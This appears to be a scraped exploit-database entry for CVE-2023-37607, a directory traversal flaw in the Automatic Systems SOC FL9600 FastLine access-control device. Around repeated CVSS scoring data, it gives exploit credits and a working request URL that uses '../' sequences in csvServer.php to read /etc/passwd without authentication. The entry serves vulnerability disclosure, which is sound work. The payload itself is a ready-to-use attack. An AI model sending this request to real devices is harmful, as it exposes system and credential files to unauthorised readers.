Lucene search

K
zdtMarcin Kozlowski1337DAY-ID-39373
HistoryFeb 27, 2024 - 12:00 a.m.

Automatic Systems SOC FL9600 FastLine - Directory Transversal Vulnerability

2024-02-2700:00:00
Marcin Kozlowski
0day.today
144
automatic systems soc fl9600 fastline
directory transversal vulnerability
exploit
mike jankowski-lorek
marcin kozlowski
cqure
cve-2023-37607
vulnerability
http
csvserver
getlist
versionsvn.

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.002

Percentile

52.0%

# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link: 
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37607

Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.002

Percentile

52.0%